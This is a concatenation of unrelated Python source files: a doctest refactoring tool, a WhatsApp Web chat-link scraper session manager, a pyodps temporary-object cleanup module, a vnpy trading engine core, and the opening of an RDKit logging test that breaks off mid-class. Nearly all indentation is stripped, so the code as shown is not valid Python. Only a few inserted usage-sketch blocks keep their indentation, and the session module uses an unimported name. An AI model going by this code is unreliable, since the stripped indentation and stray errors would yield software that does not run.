lineno += 1
if line.lstrip().startswith(self.PS1):
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block_lineno = lineno
block = [line]
i = line.find(self.PS1)
indent = line[:i]
elif (indent is not None and
(line.startswith(indent + self.PS2) or
line == indent + self.PS2.rstrip() + "\n")):
block.append(line)
else:
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block = None
indent = None
result.append(line)
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
return "".join(result)
def refactor_doctest(self, block, lineno, indent, filename):
"""Refactors one doctest.
A doctest is given as a block of lines, the first of which starts
with ">>>" (possibly indented), while the remaining lines start
with "..." (identically indented).
"""
try:
tree = self.parse_block(block, lineno, indent)
except Exception as err:
if self.logger.isEnabledFor(logging.DEBUG):
for line in block:
self.log_debug("Source: %s", line.rstrip("\n"))
self.log_error("Can't parse docstring in %s line %s: %s: %s",
filename, lineno, err.__class__.__name__, err)
return block
if self.refactor_tree(tree, filename):
new = str(tree).splitlines(True)
# Undo the adjustment of the line numbers in wrap_toks() below.
clipped, new = new[:lineno-1], new[lineno-1:]
assert clipped == ["\n"] * (lineno-1), clipped
if not new[-1].endswith("\n"):
new[-1] += "\n"
block = [indent + self.PS1 + new.pop(0)]
if new:
block += [indent + self.PS2 + line for line in new]
return block
def summarize(self):
if self.wrote:
were = "were"
else:
were = "need to be"
if not self.files:
self.log_message("No files %s modified.", were)
else:
self.log_message("Files that %s modified:", were)
for file in self.files:
self.log_message(file)
if self.fixer_log:
self.log_message("Warnings/messages while refactoring:")
for message in self.fixer_log:
self.log_message(message)
if self.errors:
if len(self.errors) == 1:
self.log_message("There was 1 error:")
else:
self.log_message("There were %d errors:", len(self.errors))
for msg, args, kwds in self.errors:
self.log_message(msg, *args, **kwds)
def parse_block(self, block, lineno, indent):
"""Parses a block into a tree.
This is necessary to get correct line number / offset information
in the parser diagnostics and embedded into the parse tree.
"""
tree = self.driver.parse_tokens(self.wrap_toks(block, lineno, indent))
tree.future_features = frozenset()
return tree
def wrap_toks(self, block, lineno, indent):
"""Wraps a tokenize stream to systematically modify start/end."""
tokens = tokenize.generate_tokens(self.gen_lines(block, indent).__next__)
for type, value, (line0, col0), (line1, col1), line_text in tokens:
line0 += lineno - 1
line1 += lineno - 1
# Don't bother updating the columns; this is too complicated
# since line_text would also have to be updated and it would
# still break for tokens spanning lines. Let the user guess
# that the column numbers for doctests are relative to the
# end of the prompt string (PS1 or PS2).
yield type, value, (line0, col0), (line1, col1), line_text
def gen_lines(self, block, indent):
"""Generates lines as expected by tokenize from a list of lines.
This strips the first len(indent + self.PS1) characters off each line.
"""
prefix1 = indent + self.PS1
prefix2 = indent + self.PS2
prefix = prefix1
for line in block:
if line.startswith(prefix):
yield line[len(prefix):]
elif line == prefix.rstrip() + "\n":
yield "\n"
else:
raise AssertionError("line=%r, prefix=%r" % (line, prefix))
prefix = prefix2
while True:
yield ""
class MultiprocessingUnsupported(Exception):
pass
class MultiprocessRefactoringTool(RefactoringTool):
def __init__(self, *args, **kwargs):
super(MultiprocessRefactoringTool, self).__init__(*args, **kwargs)
self.queue = None
self.output_lock = None
def refactor(self, items, write=False, doctests_only=False,
num_processes=1):
if num_processes == 1:
return super(MultiprocessRefactoringTool, self).refactor(
items, write, doctests_only)
try:
import multiprocessing
except ImportError:
raise MultiprocessingUnsupported
if self.queue is not None:
raise RuntimeError("already doing multiple processes")
self.queue = multiprocessing.JoinableQueue()
self.output_lock = multiprocessing.Lock()
processes = [multiprocessing.Process(target=self._child)
for i in range(num_processes)]
try:
for p in processes:
p.start()
super(MultiprocessRefactoringTool, self).refactor(items, write,
doctests_only)
finally:
self.queue.join()
for i in range(num_processes):
self.queue.put(None)
for p in processes:
if p.is_alive():
p.join()
self.queue = None
def _child(self):
task = self.queue.get()
while task is not None:
args, kwargs = task
try:
super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
finally:
self.queue.task_done()
task = self.queue.get()
def refactor_file(self, *args, **kwargs):
if self.queue is not None:
self.queue.put((args, kwargs))
else:
return super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
|
session.py
|
import logging
import time
import threading
from threading import Thread
from typing import Dict
from selenium.common.exceptions import TimeoutException
from whatsappstract.whatsapp import Whatsapp
class WhatsappSession:
"""Wrapper around the Whatsapp class to remember state and do background scraping"""
def __init__(self, n_chats=2):
self.started_time = time.time()
self.w = Whatsapp(screenshot_folder="/tmp")
self._last_qr: Optional[str] = None
self.links: Optional[list] = None
self.lock = threading.Lock()
self._thread: Optional[Thread] = None
self.status: str = "NOTSTARTED"
self._progress: Optional[int] = None
self._message: Optional[str] = None
self.n_chats: int = n_chats
def get_qr(self) -> str:
"""Go to whatsapp web and get the QR code"""
self._last_qr = self.w.get_qr()
return self._last_qr
def get_qr_status(self) -> dict:
"""Check if the user logged in and/or if a new QR code is displayed"""
if self.w.is_qr_scanned():
return {"status": "READY"}
try:
qr = self.w.get_qr()
except TimeoutException:
# Check if the app was loading the ready screen and is ready now
if self.w.is_qr_scanned():
return {"status": "READY"}
raise
if qr == self._last_qr:
return {"status": "WAITING"}
else:
self._last_qr = qr
return {"status": "REFRESH", "qr": qr}
def do_scrape(self):
logging.info("Starting scraper")
with self.lock:
if self.links is not None:
raise ValueError("Scraping already in progress")
self.links = []
self.status = "STARTED"
self._progress = 0
try:
self._do_scrape()
except Exception as e:
logging.exception("Error in scraper thread")
with self.lock:
self.status = "ERROR"
self._message = str(e)
self._progress = 0
else:
logging.info("Done!")
with self.lock:
self.status = "DONE"
self._message = f"Done, found {len(self.links)} links in total"
self._progress = 100
finally:
self.w.quit_browser()
self.w = None
def _do_scrape(self):
time.sleep(3)
for i, chat in enumerate(self.w.get_all_chats()):
if i >= self.n_chats:
break
msg = f"Scraping contact {i + 1}/{self.n_chats}: {chat.text} [{len(self.links)} links found so far]"
logging.info(msg)
with self.lock:
self._progress = round(i * 100 / self.n_chats)
self._message = msg
links = list(self.w.get_links_per_chat(chat))
with self.lock:
self.links += links
def get_progress(self):
with self.lock:
return dict(status=self.status, progress=self._progress, message=self._message)
def start_scraping(self):
self._thread = threading.Thread(target=self.do_scrape)
logging.info("Starting thread")
self._thread.start()
# Each 'session' should have one object that stays in memory
# No, it's not the way HTTP should work, but what do you do about it.
REGISTRY: Dict[str, WhatsappSession] = {}
def start_session(id: str) -> WhatsappSession:
prune_sessions()
global REGISTRY
assert id not in REGISTRY
REGISTRY[id] = WhatsappSession()
return REGISTRY[id]
def get_session(id: str) -> WhatsappSession:
global REGISTRY
assert id in REGISTRY
return REGISTRY[id]
def prune_sessions():
global REGISTRY
now = time.time()
n = len(REGISTRY)
for id, session in list(REGISTRY.items()):  # iterate over a snapshot; entries may be deleted below
duration = now - session.started_time
if duration > 60*30:
logging.info(f"Sesssion {id} was started {duration} seconds ago, pruning")
if session.w is not None:
try:
session.w.quit_browser()
except:
logging.exception(f"Error on quitting browser in session {id}")
del REGISTRY[id]
logging.info(f"Pruning done, {len(REGISTRY)} sessions left out of {n}")
|
tempobj.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2017 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import atexit
import copy
import glob
import hashlib
import json
import os
import platform
import subprocess
import sys
import tempfile
import stat
import threading
import time
import uuid
from .compat import PY26, pickle, six, builtins, futures
from .config import options
from .errors import NoSuchObject
from . import utils
from .accounts import AliyunAccount
TEMP_ROOT = utils.build_pyodps_dir('tempobjs')
SESSION_KEY = '%d_%s' % (int(time.time()), uuid.uuid4())
CLEANER_THREADS = 100
USER_FILE_RIGHTS = stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR
CLEANUP_SCRIPT_TMPL = u"""
#-*- coding:utf-8 -*-
import os
import sys
import json
try:
os.unlink(os.path.realpath(__file__))
except Exception:
pass
temp_codes = json.loads({odps_info!r})
import_paths = json.loads({import_paths!r})
biz_ids = json.loads({biz_ids!r})
if sys.version_info[0] < 3:
if sys.platform == 'win32':
import_paths = [p.encode('mbcs') for p in import_paths]
else:
import_paths = [p.encode() for p in import_paths]
normed_paths = set(os.path.normcase(os.path.normpath(p)) for p in sys.path)
import_paths = [p for p in import_paths
if os.path.normcase(os.path.normpath(p)) not in normed_paths]
sys.path.extend(import_paths)
from odps import ODPS, tempobj
if os.environ.get('WAIT_CLEANUP') == '1':
tempobj.cleanup_timeout = None
else:
tempobj.cleanup_timeout = 5
tempobj.cleanup_mode = True
tempobj.host_pid = {host_pid}
tempobj.ObjectRepositoryLib.biz_ids = set(biz_ids)
for o_desc in temp_codes:
ODPS(**tempobj.compat_kwargs(o_desc))
os._exit(0)
""".lstrip()
cleanup_mode = False
cleanup_timeout = 0
host_pid = os.getpid()
class ExecutionEnv(object):
def __init__(self, **kwargs):
self.cleaned = False
self.os = os
self.sys = sys
self._g_env = copy.copy(globals())
self.is_windows = 'windows' in platform.platform().lower()
self.pid = os.getpid()
self.os_sep = os.sep
self.executable = sys.executable
self.six = six
import_paths = copy.deepcopy(sys.path)
package_root = os.path.dirname(__file__)
if package_root not in import_paths:
import_paths.append(package_root)
self.import_path_json = utils.to_text(json.dumps(import_paths, ensure_ascii=False))
self.builtins = builtins
self.io = __import__('io', fromlist=[''])
if six.PY3:
self.conv_bytes = (lambda s: s.encode() if isinstance(s, str) else s)
self.conv_unicode = (lambda s: s if isinstance(s, str) else s.decode())
else:
self.conv_bytes = (lambda s: s.encode() if isinstance(s, unicode) else s)
self.conv_unicode = (lambda s: s if isinstance(s, unicode) else s.decode())
self.subprocess = subprocess
self.temp_dir = tempfile.gettempdir()
self.template = CLEANUP_SCRIPT_TMPL
self.file_right = USER_FILE_RIGHTS
self.is_main_process = utils.is_main_process()
for k, v in six.iteritems(kwargs):
setattr(self, k, v)
class TempObject(object):
__slots__ = []
_type = ''
_priority = 0
def __init__(self, *args, **kwargs):
for k, v in zip(self.__slots__, args):
setattr(self, k, v)
for k in self.__slots__:
if hasattr(self, k):
continue
setattr(self, k, kwargs.get(k))
def __hash__(self):
if self.__slots__:
return hash(tuple(getattr(self, k) for k in self.__slots__))
return super(TempObject, self).__hash__()
def __eq__(self, other):
if not isinstance(other, TempObject):
return False
if self._type != other._type:
return False
return all(getattr(self, k) == getattr(other, k) for k in self.__slots__)
def __ne__(self, other):
return not self.__eq__(other)
def __getstate__(self):
return dict((slot, getattr(self, slot)) for slot in self.__slots__ if hasattr(self, slot))
def __setstate__(self, state):
for slot, value in state.items():
setattr(self, slot, value)
class TempTable(TempObject):
__slots__ = 'table', 'project'
_type = 'Table'
def drop(self, odps):
odps.run_sql('drop table if exists %s' % self.table, project=self.project)
class TempModel(TempObject):
__slots__ = 'model', 'project'
_type = 'OfflineModel'
def drop(self, odps):
try:
odps.delete_offline_model(self.model, self.project)
except NoSuchObject:
pass
class TempFunction(TempObject):
__slots__ = 'function', 'project'
_type = 'Function'
_priority = 1
def drop(self, odps):
try:
odps.delete_function(self.function, self.project)
except NoSuchObject:
pass
class TempResource(TempObject):
__slots__ = 'resource', 'project'
_type = 'Resource'
def drop(self, odps):
try:
odps.delete_resource(self.resource, self.project)
except NoSuchObject:
pass
class TempVolumePartition(TempObject):
__slots__ = 'volume', 'partition', 'project'
_type = 'VolumePartition'
def drop(self, odps):
try:
odps.delete_volume_partition(self.volume, self.partition, self.project)
except NoSuchObject:
pass
class ObjectRepository(object):
def __init__(self, file_name):
self._container = set()
self._file_name = file_name
if file_name and os.path.exists(file_name):
self.load()
def put(self, obj, dump=True):
self._container.add(obj)
if dump:
self.dump()
def cleanup(self, odps, use_threads=True):
cleaned = []
def _cleaner(obj):
try:
obj.drop(odps)
cleaned.append(obj)
except:
pass
if self._container:
if use_threads:
pool = futures.ThreadPoolExecutor(CLEANER_THREADS)
list(pool.map(_cleaner, reversed(list(self._container))))
else:
for o in sorted(list(self._container), key=lambda ro: type(ro)._priority, reverse=True):
_cleaner(o)
for obj in cleaned:
if obj in self._container:
self._container.remove(obj)
if not self._container and self._file_name:
try:
os.unlink(self._file_name)
except OSError:
pass
else:
self.dump()
def dump(self):
if self._file_name is None:
return
with open(self._file_name, 'wb') as outf:
pickle.dump(list(self._container), outf, protocol=0)
outf.close()
os.chmod(self._file_name, USER_FILE_RIGHTS)
def load(self):
try:
with open(self._file_name, 'rb') as inpf:
contents = pickle.load(inpf)
self._container.update(contents)
except (EOFError, OSError):
pass
class ObjectRepositoryLib(dict):
biz_ids = set([options.biz_id, ]) if options.biz_id else set(['default', ])
odps_info = dict()
biz_ids_json = json.dumps(list(biz_ids))
odps_info_json = json.dumps([v for v in six.itervalues(odps_info)])
def __init__(self, *args, **kwargs):
super(ObjectRepositoryLib, self).__init__(*args, **kwargs)
self._env = ExecutionEnv()
def __del__(self):
self._exec_cleanup_script()
@classmethod
def add_biz_id(cls, biz_id):
cls.biz_ids.add(biz_id)
cls.biz_ids_json = json.dumps(list(cls.biz_ids))
@classmethod
def add_odps_info(cls, odps):
odps_key = _gen_repository_key(odps)
cls.odps_info[odps_key] = dict(
access_id=odps.account.access_id, secret_access_key=odps.account.secret_access_key,
project=odps.project, endpoint=odps.endpoint
)
cls.odps_info_json = json.dumps([v for v in six.itervalues(cls.odps_info)])
def _exec_cleanup_script(self):
global cleanup_mode
if not self:
return
env = self._env
if cleanup_mode or not env.is_main_process or env.cleaned:
return
env.cleaned = True
script = env.template.format(import_paths=env.import_path_json, odps_info=self.odps_info_json,
host_pid=env.pid, biz_ids=self.biz_ids_json)
script_name = env.temp_dir + env.os_sep + 'tmp_' + str(env.pid) + '_cleanup_script.py'
script_file = env.io.FileIO(script_name, 'w')
script_file.write(env.conv_bytes(script))
script_file.close()
try:
if env.is_windows:
env.os.chmod(script_name, env.file_right)
else:
env.subprocess.call(['chmod', oct(env.file_right).replace('o', ''), script_name])
except:
pass
kwargs = dict(close_fds=True)
if env.is_windows:
si = subprocess.STARTUPINFO()
si.dwFlags |= subprocess.STARTF_USESHOWWINDOW
kwargs['startupinfo'] = si
env.subprocess.call([env.executable, script_name], **kwargs)
_cleaned_keys = set()
_obj_repos = ObjectRepositoryLib() # this line should be put last due to initialization dependency
atexit.register(_obj_repos._exec_cleanup_script)
def _is_pid_running(pid):
if 'windows' in platform.platform().lower():
task_lines = os.popen('TASKLIST /FI "PID eq {0}" /NH'.format(pid)).read().strip().splitlines()
if not task_lines:
return False
return str(pid) in set(task_lines[0].split())
else:
try:
os.kill(pid, 0)
return True
except OSError:
return False
def clean_objects(odps, biz_ids=None):
odps_key = _gen_repository_key(odps)
files = []
biz_ids = biz_ids or _obj_repos.biz_ids
for biz_id in biz_ids:
files.extend(glob.glob(os.path.join(TEMP_ROOT, biz_id, odps_key, '*.his')))
for fn in files:
repo = ObjectRepository(fn)
repo.cleanup(odps, use_threads=False)
def clean_stored_objects(odps):
global cleanup_timeout, host_pid
if not utils.is_main_process():
return
odps_key = _gen_repository_key(odps)
if odps_key in _cleaned_keys:
return
_cleaned_keys.add(odps_key)
files = []
for biz_id in _obj_repos.biz_ids:
files.extend(glob.glob(os.path.join(TEMP_ROOT, biz_id, odps_key, '*.his')))
def clean_thread():
for fn in files:
writer_pid = int(fn.rsplit('__', 1)[-1].split('.', 1)[0])
# do not clean up after a process that is still running, unless its pid equals host_pid
if writer_pid != host_pid and _is_pid_running(writer_pid):
continue
repo = ObjectRepository(fn)
repo.cleanup(odps)
thread_obj = threading.Thread(target=clean_thread)
thread_obj.start()
if cleanup_timeout == 0:
return
else:
if cleanup_timeout is not None and cleanup_timeout < 0:
cleanup_timeout = None
thread_obj.join(cleanup_timeout)
def _gen_repository_key(odps):
return hashlib.md5('####'.join([odps.account.access_id, odps.endpoint, odps.project]).encode('utf-8')).hexdigest()
def _put_objects(odps, objs):
odps_key = _gen_repository_key(odps)
biz_id = options.biz_id if options.biz_id else 'default'
ObjectRepositoryLib.add_biz_id(biz_id)
if odps_key not in _obj_repos:
if isinstance(odps.account, AliyunAccount):
ObjectRepositoryLib.add_odps_info(odps)
file_dir = os.path.join(TEMP_ROOT, biz_id, odps_key)
try:
if not os.path.exists(file_dir):
os.makedirs(file_dir)
except OSError:
pass
file_name = os.path.join(file_dir, 'temp_objs_{0}__{1}.his'.format(SESSION_KEY, os.getpid()))
_obj_repos[odps_key] = ObjectRepository(file_name)
[_obj_repos[odps_key].put(o, False) for o in objs]
_obj_repos[odps_key].dump()
def register_temp_table(odps, table, project=None):
if isinstance(table, six.string_types):
table = [table, ]
_put_objects(odps, [TempTable(t, project if project else odps.project) for t in table])
def register_temp_model(odps, model, project=None):
if isinstance(model, six.string_types):
model = [model, ]
_put_objects(odps, [TempModel(m, project if project else odps.project) for m in model])
def register_temp_resource(odps, resource, project=None):
if isinstance(resource, six.string_types):
resource = [resource, ]
_put_objects(odps, [TempResource(r, project if project else odps.project) for r in resource])
def register_temp_function(odps, func, project=None):
if isinstance(func, six.string_types):
func = [func, ]
_put_objects(odps, [TempFunction(f, project if project else odps.project) for f in func])
def register_temp_volume_partition(odps, volume_partition_tuple, project=None):
if isinstance(volume_partition_tuple, tuple):
volume_partition_tuple = [volume_partition_tuple, ]
_put_objects(odps, [TempVolumePartition(v, p, project if project else odps.project)
for v, p in volume_partition_tuple])
def compat_kwargs(kwargs):
if PY26:
new_desc = dict()
for k, v in six.iteritems(kwargs):
new_desc[k.encode('utf-8') if isinstance(k, unicode) else k] = v.encode('utf-8')
return new_desc
else:
return kwargs
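# Hedged usage sketch (not part of the original module): how callers typically
# register temporary objects so the cleanup machinery can drop them later.
# Credentials, project, endpoint and the table name below are placeholders.
if __name__ == "__main__":
    from odps import ODPS  # assumed to be importable alongside this module
    o = ODPS("<access-id>", "<secret-access-key>",
             project="<project>", endpoint="<endpoint>")
    clean_stored_objects(o)  # drop leftovers recorded by dead sessions
    register_temp_table(o, "tmp_pyodps_demo_table")
    # The table is dropped by the atexit-spawned cleanup script when the
    # host process exits.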
|
engine.py
|
"""
"""
import logging
import smtplib
import os
from abc import ABC
from datetime import datetime
from email.message import EmailMessage
from queue import Empty, Queue
from threading import Thread
from typing import Any, Sequence, Type
from vnpy.event import Event, EventEngine
from .app import BaseApp
from .event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION,
EVENT_ACCOUNT,
EVENT_CONTRACT,
EVENT_LOG
)
from .gateway import BaseGateway
from .object import (
CancelRequest,
LogData,
OrderRequest,
SubscribeRequest,
HistoryRequest
)
from .setting import SETTINGS
from .utility import get_folder_path, TRADER_DIR
class MainEngine:
"""
Acts as the core of VN Trader.
"""
def __init__(self, event_engine: EventEngine = None):
""""""
if event_engine:
self.event_engine = event_engine
else:
self.event_engine = EventEngine()
self.event_engine.start()
self.gateways = {}
self.engines = {}
self.apps = {}
self.exchanges = []
os.chdir(TRADER_DIR) # Change working directory
self.init_engines() # Initialize function engines
def add_engine(self, engine_class: Any):
"""
Add function engine.
"""
engine = engine_class(self, self.event_engine)
self.engines[engine.engine_name] = engine
return engine
def add_gateway(self, gateway_class: Type[BaseGateway]):
"""
Add gateway.
"""
gateway = gateway_class(self.event_engine)
self.gateways[gateway.gateway_name] = gateway
# Add gateway supported exchanges into engine
for exchange in gateway.exchanges:
if exchange not in self.exchanges:
self.exchanges.append(exchange)
return gateway
def add_app(self, app_class: Type[BaseApp]):
"""
Add app.
"""
app = app_class()
self.apps[app.app_name] = app
engine = self.add_engine(app.engine_class)
return engine
def init_engines(self):
"""
Init all engines.
"""
self.add_engine(LogEngine)
self.add_engine(OmsEngine)
self.add_engine(EmailEngine)
def write_log(self, msg: str, source: str = ""):
"""
Put log event with specific message.
"""
log = LogData(msg=msg, gateway_name=source)
event = Event(EVENT_LOG, log)
self.event_engine.put(event)
def get_gateway(self, gateway_name: str):
"""
Return gateway object by name.
"""
gateway = self.gateways.get(gateway_name, None)
if not gateway:
self.write_log(f"找不到底层接口:{gateway_name}")
return gateway
def get_engine(self, engine_name: str):
"""
Return engine object by name.
"""
engine = self.engines.get(engine_name, None)
if not engine:
self.write_log(f"找不到引擎:{engine_name}")
return engine
def get_default_setting(self, gateway_name: str):
"""
Get default setting dict of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.get_default_setting()
return None
def get_all_gateway_names(self):
"""
Get the names of all gateways added to the main engine.
"""
return list(self.gateways.keys())
def get_all_apps(self):
"""
Get all app objects.
"""
return list(self.apps.values())
def get_all_exchanges(self):
"""
Get all exchanges.
"""
return self.exchanges
def connect(self, setting: dict, gateway_name: str):
"""
Start connection of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.connect(setting)
def subscribe(self, req: SubscribeRequest, gateway_name: str):
"""
Subscribe to tick data updates from a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.subscribe(req)
def send_order(self, req: OrderRequest, gateway_name: str):
"""
Send new order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_order(req)
else:
return ""
def cancel_order(self, req: CancelRequest, gateway_name: str):
"""
Send cancel order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.cancel_order(req)
def send_orders(self, reqs: Sequence[OrderRequest], gateway_name: str):
"""
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_orders(reqs)
else:
return ["" for req in reqs]
def cancel_orders(self, reqs: Sequence[CancelRequest], gateway_name: str):
"""
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.cancel_orders(reqs)
def query_history(self, req: HistoryRequest, gateway_name: str):
"""
Send a history query request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.query_history(req)
else:
return None
def close(self):
"""
Make sure every gateway and app is closed properly before
programme exit.
"""
# Stop event engine first to prevent new timer event.
self.event_engine.stop()
for engine in self.engines.values():
engine.close()
for gateway in self.gateways.values():
gateway.close()
class BaseEngine(ABC):
"""
Abstract class for implementing a function engine.
"""
def __init__(
self,
main_engine: MainEngine,
event_engine: EventEngine,
engine_name: str,
):
""""""
self.main_engine = main_engine
self.event_engine = event_engine
self.engine_name = engine_name
def close(self):
""""""
pass
class LogEngine(BaseEngine):
"""
Processes log event and output with logging module.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(LogEngine, self).__init__(main_engine, event_engine, "log")
if not SETTINGS["log.active"]:
return
self.level = SETTINGS["log.level"]
self.logger = logging.getLogger("VN Trader")
self.logger.setLevel(self.level)
self.formatter = logging.Formatter(
"%(asctime)s %(levelname)s: %(message)s"
)
self.add_null_handler()
if SETTINGS["log.console"]:
self.add_console_handler()
if SETTINGS["log.file"]:
self.add_file_handler()
self.register_event()
def add_null_handler(self):
"""
Add null handler for logger.
"""
null_handler = logging.NullHandler()
self.logger.addHandler(null_handler)
def add_console_handler(self):
"""
Add console output of log.
"""
console_handler = logging.StreamHandler()
console_handler.setLevel(self.level)
console_handler.setFormatter(self.formatter)
self.logger.addHandler(console_handler)
def add_file_handler(self):
"""
Add file output of log.
"""
today_date = datetime.now().strftime("%Y%m%d")
filename = f"vt_{today_date}.log"
log_path = get_folder_path("log")
file_path = log_path.joinpath(filename)
file_handler = logging.FileHandler(
file_path, mode="a", encoding="utf8"
)
file_handler.setLevel(self.level)
file_handler.setFormatter(self.formatter)
self.logger.addHandler(file_handler)
def register_event(self):
""""""
self.event_engine.register(EVENT_LOG, self.process_log_event)
def process_log_event(self, event: Event):
"""
Process log event.
"""
log = event.data
self.logger.log(log.level, log.msg)
class OmsEngine(BaseEngine):
"""
Provides order management system function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(OmsEngine, self).__init__(main_engine, event_engine, "oms")
self.ticks = {}
self.orders = {}
self.trades = {}
self.positions = {}
self.accounts = {}
self.contracts = {}
self.active_orders = {}
self.add_function()
self.register_event()
def add_function(self):
"""Add query function to main engine."""
self.main_engine.get_tick = self.get_tick
self.main_engine.get_order = self.get_order
self.main_engine.get_trade = self.get_trade
self.main_engine.get_position = self.get_position
self.main_engine.get_account = self.get_account
self.main_engine.get_contract = self.get_contract
self.main_engine.get_all_ticks = self.get_all_ticks
self.main_engine.get_all_orders = self.get_all_orders
self.main_engine.get_all_trades = self.get_all_trades
self.main_engine.get_all_positions = self.get_all_positions
self.main_engine.get_all_accounts = self.get_all_accounts
self.main_engine.get_all_contracts = self.get_all_contracts
self.main_engine.get_all_active_orders = self.get_all_active_orders
def register_event(self):
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_ORDER, self.process_order_event)
self.event_engine.register(EVENT_TRADE, self.process_trade_event)
self.event_engine.register(EVENT_POSITION, self.process_position_event)
self.event_engine.register(EVENT_ACCOUNT, self.process_account_event)
self.event_engine.register(EVENT_CONTRACT, self.process_contract_event)
def process_tick_event(self, event: Event):
""""""
tick = event.data
self.ticks[tick.vt_symbol] = tick
def process_order_event(self, event: Event):
""""""
order = event.data
self.orders[order.vt_orderid] = order
# If order is active, then update data in dict.
if order.is_active():
self.active_orders[order.vt_orderid] = order
# Otherwise, pop inactive order from the dict.
elif order.vt_orderid in self.active_orders:
self.active_orders.pop(order.vt_orderid)
def process_trade_event(self, event: Event):
""""""
trade = event.data
self.trades[trade.vt_tradeid] = trade
def process_position_event(self, event: Event):
""""""
position = event.data
self.positions[position.vt_positionid] = position
def process_account_event(self, event: Event):
""""""
account = event.data
self.accounts[account.vt_accountid] = account
def process_contract_event(self, event: Event):
""""""
contract = event.data
self.contracts[contract.vt_symbol] = contract
def get_tick(self, vt_symbol):
"""
Get latest market tick data by vt_symbol.
"""
return self.ticks.get(vt_symbol, None)
def get_order(self, vt_orderid):
"""
Get latest order data by vt_orderid.
"""
return self.orders.get(vt_orderid, None)
def get_trade(self, vt_tradeid):
"""
Get trade data by vt_tradeid.
"""
return self.trades.get(vt_tradeid, None)
def get_position(self, vt_positionid):
"""
Get latest position data by vt_positionid.
"""
return self.positions.get(vt_positionid, None)
def get_account(self, vt_accountid):
"""
Get latest account data by vt_accountid.
"""
return self.accounts.get(vt_accountid, None)
def get_contract(self, vt_symbol):
"""
Get contract data by vt_symbol.
"""
return self.contracts.get(vt_symbol, None)
def get_all_ticks(self):
"""
Get all tick data.
"""
return list(self.ticks.values())
def get_all_orders(self):
"""
Get all order data.
"""
return list(self.orders.values())
def get_all_trades(self):
"""
Get all trade data.
"""
return list(self.trades.values())
def get_all_positions(self):
"""
Get all position data.
"""
return list(self.positions.values())
def get_all_accounts(self):
"""
Get all account data.
"""
return list(self.accounts.values())
def get_all_contracts(self):
"""
Get all contract data.
"""
return list(self.contracts.values())
def get_all_active_orders(self, vt_symbol: str = ""):
"""
Get all active orders by vt_symbol.
If vt_symbol is empty, return all active orders.
"""
if not vt_symbol:
return list(self.active_orders.values())
else:
active_orders = [
order
for order in self.active_orders.values()
if order.vt_symbol == vt_symbol
]
return active_orders
class EmailEngine(BaseEngine):
"""
Provides email sending function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(EmailEngine, self).__init__(main_engine, event_engine, "email")
self.thread = Thread(target=self.run)
self.queue = Queue()
self.active = False
self.main_engine.send_email = self.send_email
def send_email(self, subject: str, content: str, receiver: str = ""):
""""""
# Start email engine when sending first email.
if not self.active:
self.start()
# Use default receiver if not specified.
if not receiver:
receiver = SETTINGS["email.receiver"]
msg = EmailMessage()
msg["From"] = SETTINGS["email.sender"]
msg["To"] = SETTINGS["email.receiver"]
msg["Subject"] = subject
msg.set_content(content)
self.queue.put(msg)
def run(self):
""""""
while self.active:
try:
msg = self.queue.get(block=True, timeout=1)
with smtplib.SMTP_SSL(
SETTINGS["email.server"], SETTINGS["email.port"]
) as smtp:
smtp.login(
SETTINGS["email.username"], SETTINGS["email.password"]
)
smtp.send_message(msg)
except Empty:
pass
def start(self):
""""""
self.active = True
self.thread.start()
def close(self):
""""""
if not self.active:
return
self.active = False
self.thread.join()
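# Hedged usage sketch (not part of the original module): minimal wiring of the
# trader core. SomeGateway stands in for any concrete BaseGateway subclass
# shipped by a separate gateway package (illustrative name only).
if __name__ == "__main__":
    event_engine = EventEngine()
    main_engine = MainEngine(event_engine)
    main_engine.write_log("MainEngine initialized")
    # gateway = main_engine.add_gateway(SomeGateway)          # hypothetical gateway class
    # main_engine.connect(gateway.get_default_setting(), gateway.gateway_name)
    main_engine.close()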
|
UnitTestLogging.py
|
#
# Copyright (C) 2022 Kevin Burk
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
"""
unit testing code for various logging schemes
"""
import collections
import datetime
import io
import logging
import os
import sys
import tempfile
import threading
import time
import unittest
import rdkit
from rdkit import rdBase
class CaptureStream:
"""Helper class that captures output to a file descriptor"""
def __init__(self, fd):
self.fd = fd
self.old = os.dup(self.fd)
self.tmp = tempfile.TemporaryFile()
os.dup2(self.tmp.fileno(), self.fd)
def release(self):
self.tmp.seek(0)
result = self.tmp.read()
os.dup2(self.old, self.fd)
os.close(self.old)
self.tmp.close()
return result.decode('utf-8')
class CapturePython:
"""Helper class that captures Python output"""
def __init__(self, stream):
self.stream = stream
self.new = io.StringIO()
self.old = getattr(sys, self.stream)
setattr(sys, self.stream, self.new)
def release(self):
